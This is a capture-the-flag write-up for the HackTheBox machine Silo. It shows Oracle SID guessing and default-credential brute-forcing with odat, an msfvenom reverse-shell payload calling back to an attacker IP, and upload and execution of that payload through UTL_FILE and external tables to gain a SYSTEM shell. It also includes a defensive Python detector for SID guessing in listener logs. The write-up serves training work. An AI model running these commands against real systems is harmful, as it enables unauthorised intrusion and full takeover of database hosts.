
HackTheBox Silo

Author: Edwin Tok | Shiro

IP Address: 10.10.10.82

Key Exploitation Techniques:

  • Oracle TNS listener enumeration (SID guessing)
  • Oracle account brute-forcing
  • Oracle UTL_FILE package abuse for file upload
  • Oracle EXTERNALTABLE for command execution

Enumeration

$ nmap -sC -sV -A -p- 10.10.10.82

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
|_http-title: 400 Bad Request
|_http-server-header: Oracle XML DB/Oracle Database
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC

The scan identified IIS on port 80, SMB services and, crucially, an Oracle TNS listener on port 1521 and Oracle XML DB HTTPD on port 8080.

Website

A quick gobuster scan on port 80 yielded no interesting web content beyond /aspnet_client.

$ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt -t 50 
...
/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
...

The focus shifted to the Oracle services.

Exploitation

Oracle Enumeration & RCE (SYSTEM)

The Oracle Database Attack Tool (odat) was used to enumerate the Oracle TNS listener. First, sidguesser identified valid SIDs.

$ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
...
[+] SIDs found on the 10.10.10.82:1521 server: XE

The valid SID XE was found. Next, passwordguesser was used to brute-force credentials for this SID.

$ odat passwordguesser -s 10.10.10.82 -d XE
...
[+] Valid credentials found: scott/tiger. Continue...
...
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger

The default credentials scott/tiger were successfully identified.
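From the defender's side, the SID-guessing stage above leaves a clear trace: every unknown SID the listener rejects is logged with return code 12505 (12514 for an unknown service name). The following is an added example, not part of the original writeup, that parses a constructed listener.log excerpt (the classic text listener.log layout is assumed) and flags a client that draws a burst of unknown-SID replies, recording which name then connected successfully from the same host.

```python
import re
from collections import defaultdict

# Constructed listener.log excerpt (sample data, not from the box): one client
# asks for several SIDs the listener does not know (return code 12505) and then
# hits XE (return code 0); a second client connects normally by service name.
SAMPLE_LOG = """\
12-MAR-2024 10:01:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.6)(PORT=50214)) * establish * ORCL * 12505
12-MAR-2024 10:01:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.6)(PORT=50215)) * establish * PROD * 12505
12-MAR-2024 10:01:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.6)(PORT=50216)) * establish * TEST * 12505
12-MAR-2024 10:01:03 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.6)(PORT=50217)) * establish * XE * 0
12-MAR-2024 10:02:40 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=40122)) * establish * XE * 0
12-MAR-2024 10:02:41 * service_update * XE * 0
"""

HOST_RE = re.compile(r"\(HOST=([^)]*)\)")
UNKNOWN_NAME_CODES = {"12505", "12514"}  # unknown SID / unknown service name


def parse_establish(line):
    """Return (client_host, requested_name, return_code) for a connect request,
    or None for other listener.log records such as service_update."""
    parts = line.split(" * ")
    if len(parts) < 6 or parts[3] != "establish":
        return None
    m = HOST_RE.search(parts[2])  # the client ADDRESS field, not the CID HOST
    return (m.group(1) if m else "?", parts[4], parts[5].strip())


def detect_sid_guessing(log_text, threshold=3):
    """Flag client hosts that drew at least `threshold` unknown-name replies,
    and record the first name that then connected successfully from them."""
    per_host = defaultdict(lambda: {"unknown": [], "hit": None})
    for line in log_text.splitlines():
        rec = parse_establish(line)
        if rec is None:
            continue
        host, name, code = rec
        state = per_host[host]
        if code in UNKNOWN_NAME_CODES:
            state["unknown"].append(name)
        elif code == "0" and state["unknown"] and state["hit"] is None:
            state["hit"] = name
    return {h: s for h, s in per_host.items() if len(s["unknown"]) >= threshold}


if __name__ == "__main__":
    for host, s in detect_sid_guessing(SAMPLE_LOG).items():
        print(f"{host}: {len(s['unknown'])} unknown names tried, then {s['hit']}")
```

On a real deployment the same logic runs over the listener's alert-directory log; a burst of 12505 replies followed by a successful connect from the same client is the signature of the sidguesser step, and the later passwordguesser step shows up separately as repeated ORA-01017 logon failures in the database audit trail.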

A Windows reverse shell executable (exploit.exe) was generated using msfvenom.

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=1234 -f exe > exploit.exe

odat’s utlfile module was then used to upload exploit.exe to the /temp directory on the remote server. Initial attempts failed due to insufficient privileges.

$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe

[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[-] Impossible to put the /home/shiro/HackTheBox/Silo/exploit.exe file: `ORA-01031: insufficient privileges`

The --sysdba flag was added to odat to connect with SYSDBA privileges, which resolved the permission issue.

$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe --sysdba

[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[+] The /home/shiro/HackTheBox/Silo/exploit.exe file was created on the /temp directory on the 10.10.10.82 server like the exploit.exe file

Finally, odat’s externaltable module was used to execute the uploaded exploit.exe. A netcat listener was started first to catch the shell.

# On attacker, set up Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

# Execute the uploaded binary
$ odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --exec /temp exploit.exe --sysdba

[1] (10.10.10.82:1521): Execute the exploit.exe command stored in the /temp path

# Reverse shell received
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.82] 49181
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system

The reverse shell came back as NT AUTHORITY\SYSTEM, so no privilege escalation was needed: both user.txt and root.txt were read directly.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>cd C:\Users
C:\Users>type C:\Users\Phineas\Desktop\user.txt
<redacted>

C:\Users>type C:\Users\Administrator\Desktop\root.txt
<redacted>
